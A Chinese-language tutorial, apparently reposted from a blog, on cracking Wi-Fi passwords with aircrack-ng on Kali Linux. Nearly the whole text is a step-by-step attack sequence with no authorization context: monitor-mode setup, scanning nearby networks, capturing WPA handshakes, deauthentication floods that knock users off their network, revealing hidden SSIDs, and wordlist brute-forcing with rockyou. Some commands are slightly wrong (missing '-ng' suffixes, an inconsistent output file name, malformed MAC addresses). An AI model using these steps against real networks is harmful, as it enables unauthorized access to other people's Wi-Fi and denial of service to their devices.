aircrack-ng教程 常用命令及作用
作者:互联网
配置一(虚拟机kali):
外接 无线网卡
Vmware 将网络配置 设置为 仅主机模式
虚拟机连接usb无线网卡
测试结果:抓握手包会频繁掉线,无法正常使用
配置二(usb版kali):
上网本自带网卡不支持监听模式.
外接usb无线网卡可开启监听模式
测试结果:运行稳定,可抓握手包,可破解.
开始:
1.键入第一个命令:
airmon-ng check kill
K掉影响网卡的进程,一般情况下,每次重启或者开机后这些进程都会自己开始,因此第一次使用都需要K掉这些进程(之后只要不重启或者关机都不用再次键入这个命令,直接开启就行,也就是第二个命令)
2.键入第二个命令:正常模式(Managed)
Sudo ifconfig wlan0 down
Sudo iwconfig wlan0 mode monitor(开启监听模式)
Sudo ifconfig wlan0 up
iwconfig查看网卡mode是否处于监听模式
3.键入第三个命令:(ch频道号 enc加密方式)
Sudo airodump-ng wlan0 (查看附近wifi网络)
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
2H:A6:8D:82:BC:7A -52 751 41 0 1 270 WPA2 CCMP PSK HUAWEI
A0:AA:CC:D7:89:47 -71 953 30 0 6 540 WPA2 CCMP PSK TP-LINK
B8:BA:08:V0:YD:41 -86 559 1 0 5 130 OPN Tenda
上面列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。按Ctrl-C结束。
4.键入第四个命令:(开始抓包)
airodump -w newdata -c 1 wlan0
解释:
-w表示保存握手包,“newdata”为包的名称,可随意设置,最终的文件为sofia-01.cap
-c 1表示指定频道1,wlan0指定网卡设备。
即开始在抓频道1上的包
当然我们也可以指定破解我们想要的AP
airodump-ng -w newdata -c 1 --bssid 2H:A6:8D:82:BC:7A wlan0
解释:--bssid嗅探指定无线AP,后面跟着AP的bssid,这时候可以等待握手包的获取。
英文解释:
1.BSSID–无线AP(路由器)的MAC地址,如果你想PJ哪个路由器的密码就把这个信息记下来备用。
2.PWR–这个值的大小反应信号的强弱,越大越好。很重要!!!
3.RXQ–丢包率,越小越好,此值对PJ密码影响不大,不必过于关注、
4.Beacons–准确的含义忘记了,大致就是反应客户端和AP的数据交换情况,通常此值不断变化。
5.#Data–这个值非常重要,直接影响到密码PJ的时间长短,如果有用户正在下载文件或看电影等大量数据传输的话,此值增长较快。
6.CH–工作频道。
7.MB–连接速度
8.ENC–编码方式。通常有WEP、WPA、TKIP等方式,本文所介绍的方法在WEP下测试100%成功,其余方式本人 并未验证。
9.ESSID–可以简单的理解为局域网的名称,就是通常我们在搜索无线网络时看到的列表里面的各个网络的名称。
攻击隐藏wifi:
带有length:xx的就是隐藏wifi,名称我也不知道.执行命令
airodump-ng -c 10 --bssid 50:FA:84:17:06:CC wlan0
之后执行洪水攻击:
aireplay-ng -0 0 -a 50:FA:84:17:06:CC -c 80:FA:5B:xx:xx:xx wlan0mon
当对方重新进行连接时,监控窗口就会获取隐藏的wifi名称.
强制设备重新连接到路由器,若「有用户连接/重连接到wifi,即可抓到包」。但在实际情况中,可能在很长的时间中都没有用户连接WiFi,因此,「我们需要迫使用户重新连接WiFi」。
而kali中有一个叫aireplay-ng的工具,它可以强制用户断开wifi连接;其原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
但是,「aireplay-ng的生效前提是,wifi网络中至少有一个连接的设备」。
从图中可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。 这里STATION为04:EA:56:91:88:13
「新开一个终端」,输入aireplay-ng -0 6 -c 50:FA:84:17:06:CC -a 4C:49:E3:4A:64:09 wlan0mon
参数解释:
-0发起deauthentication攻击,后面的数字为攻击次数,这里攻击6次
-c指定强制断开的设备,即上一步的STATION
-a指定无线路由器BSSID
按ctrl+c结束攻击。
当找到握手包 在之前设定的目录中可以找到形如xxx.cap的握手包, 若出现多个握手包,一般使用最后一个,或者使用其他工具查看有效的握手包。
爆破密码:
Aircrack -w /home/kali/Desktop/rockyou.txt -b 50:FA:84:17:06:CC /home/kali/Desktop/newdata1.cap
标签:握手,wifi,ng,网卡,wlan0,常用命令,连接,aircrack 来源: https://blog.csdn.net/weixin_50263804/article/details/110633008